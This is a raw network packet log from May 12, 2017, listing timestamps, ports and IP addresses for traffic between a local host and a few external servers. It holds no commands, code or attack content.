May 12, 2017 18:54:49.304522038 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.304536104 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.304600000 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.304610014 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.305855036 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.305872917 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.306011915 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.306024075 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.306083918 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.306096077 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.306569099 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.306582928 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.306647062 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.306657076 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.307514906 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.307529926 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.307596922 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.307607889 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.307842016 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.307853937 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.307991982 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.308002949 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.308124065 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.308135033 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.308202982 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.308213949 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.308626890 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.308645010 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.308713913 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.308726072 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.308784008 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.308793068 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.308948994 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.308964014 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.309020996 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.309031963 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.309326887 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.309343100 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.309405088 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.309417009 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.309474945 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.309485912 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.309612036 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.309624910 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.471899033 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.507204056 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.507236958 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.507252932 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.507335901 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:49.516706944 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.516726017 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.516742945 CEST4434919785.235.250.88192.168.1.16
May 12, 2017 18:54:49.516860962 CEST49197443192.168.1.1685.235.250.88
May 12, 2017 18:54:49.585984945 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:49.591164112 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:49.591198921 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:49.672487020 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.672585011 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.674907923 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.674938917 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.674948931 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.674959898 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.675019979 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.675065041 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.675088882 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.675642967 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.708914042 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.708942890 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.708976984 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.709204912 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.710120916 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.710642099 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.710670948 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.710748911 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.710768938 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.732767105 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.732789040 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.733236074 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.733253956 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.734841108 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.734854937 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.734949112 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.734970093 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.735471964 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.735482931 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.735629082 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.735647917 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.743743896 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.743757963 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.743777990 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.743858099 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.743880987 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.744239092 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.744256020 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.753110886 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.753134012 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.753408909 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.753427029 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.761785984 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.761807919 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.761935949 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.761956930 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.770044088 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.770070076 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.770153999 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.770174026 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.770212889 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.770231962 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.770636082 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.770653009 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.784610987 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.784640074 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.784735918 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.784756899 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.792706966 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.792730093 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.793453932 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.793467045 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.805639029 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.805668116 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.805843115 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.805860996 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.805871964 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.805886984 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.805907965 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.806456089 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.806534052 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.812761068 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.814930916 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.814954042 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.815059900 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.815080881 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.835871935 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:49.836178064 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.836201906 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.836282015 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.836302042 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.836318970 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.836332083 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.836489916 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.836504936 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.838537931 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:49.838557959 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:49.844548941 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.844571114 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.844691992 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.844712019 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.865550041 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.865572929 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.865716934 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.865731001 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.866072893 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.866739988 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.866764069 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.866868019 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.866884947 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.866900921 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.867063046 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.867078066 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.867153883 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.867168903 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.895507097 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.895530939 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.895543098 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.895628929 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.895648003 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.895689964 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.895708084 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.895781994 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.895797014 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.904983997 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.905014992 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.905159950 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.905179977 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.922791958 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:49.922880888 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.922914028 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.924587011 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.924602985 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.927840948 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:49.927869081 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:49.930988073 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.931010962 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.931088924 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.931098938 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.931116104 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.931128979 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.931145906 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.931370974 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.931806087 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.931951046 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.949642897 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.949666023 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.949806929 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.949821949 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.949840069 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.949853897 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.949889898 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.949980974 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.959202051 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.959224939 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.959239960 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.960593939 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.984493017 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.984524012 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.984535933 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.984549046 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.984560966 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.984615088 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.984632969 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:49.985868931 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:49.994097948 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.006169081 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.006194115 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.006249905 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.006273031 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.014879942 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.014911890 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.014992952 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.015012026 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.018511057 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.022994041 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.023017883 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.023103952 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.023122072 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.024041891 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.024068117 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.024142981 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.024159908 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.032172918 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.032196999 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.032280922 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.032299995 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.033320904 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.033337116 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.033432961 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.033448935 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.042587042 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.042609930 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.042712927 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.042727947 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.061693907 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.061712980 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.061769009 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.061778069 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.061783075 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.061831951 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.061846972 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.071227074 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:50.071240902 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:50.071365118 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:50.080339909 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.080354929 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.080533981 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.080560923 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.081954956 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.081984043 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.082036972 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.082052946 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.090245962 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.090274096 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.090325117 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.090337038 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.090512037 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.099630117 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.099656105 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.099670887 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.099750996 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.105943918 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.105967999 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.105983973 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.106054068 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.112808943 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.112833023 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.112844944 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.112981081 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.119332075 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.119359016 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.119379044 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.119478941 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.128741026 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.128763914 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.128773928 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.128851891 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.133522034 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.135061979 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.135087967 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.135190010 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.135210991 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.152189970 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.152215958 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.152225971 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.152333975 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.152355909 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.165225983 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.165404081 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:50.367636919 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:50.384469986 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.568451881 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:50.568552971 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:50.604465961 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:50.604626894 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:51.044480085 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:51.048340082 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.190241098 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.190263033 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.190275908 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.190294027 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.190378904 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.190792084 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.190818071 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.190828085 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.190862894 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.190891027 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.190907001 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.190927029 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.190946102 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.190951109 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.190963984 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.190973043 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191085100 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.191103935 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191116095 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191124916 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191134930 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191139936 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191160917 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191174984 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191191912 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191198111 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191205025 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191268921 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191299915 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191314936 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191329956 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191354990 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191364050 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191373110 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191401005 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191418886 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.191432953 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.192673922 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.192701101 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.192715883 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.192723989 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.192732096 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.192739964 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.192748070 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.192754984 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.192763090 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.192770004 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.192778111 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.192785025 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.192792892 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.192812920 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.193157911 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:52.193192005 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:52.193327904 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.193439960 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:54:52.193460941 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:52.194689989 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.201994896 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.202025890 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202049971 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202159882 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.202507973 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:52.202526093 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202538967 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202548027 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202554941 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202573061 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202579975 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202588081 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202605009 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202614069 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202619076 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202625036 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202630043 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202657938 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202666998 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202672005 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202677965 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202682972 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:52.202687979 CEST99349199195.154.107.23192.168.1.16
